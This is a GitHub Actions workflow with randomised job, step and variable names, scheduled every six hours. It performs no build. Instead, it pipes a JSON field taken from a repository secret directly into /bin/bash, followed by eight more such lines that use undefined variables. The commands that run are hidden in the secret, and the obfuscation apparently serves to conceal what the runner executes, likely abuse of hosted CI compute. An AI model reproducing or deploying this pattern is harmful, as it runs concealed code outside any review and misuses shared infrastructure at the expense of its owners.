name: yubanzhi4980

on:
  workflow_dispatch:
  schedule:
    - cron: '38 0/6 * * *'
jobs:  # 15366
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yubanzhi4980
        env:
          taddb0: ${{ secrets.taddb0 }}
        run: |
          echo $taddb0 | jq -r .q901 | /bin/bash
          echo $i82633 | jq -r .nsfwi6467 | /bin/bash
          echo $ieys92217 | jq -r .mw760 | /bin/bash
          echo $z4781 | jq -r .obwcy515 | /bin/bash
          echo $opry20409 | jq -r .wjm542 | /bin/bash
          echo $vgwvu0498 | jq -r .e2738 | /bin/bash
          echo $xzs82 | jq -r .aowk4120 | /bin/bash
          echo $vm82 | jq -r .yauw4 | /bin/bash
          echo $luzl263 | jq -r .tjfx4626 | /bin/bash

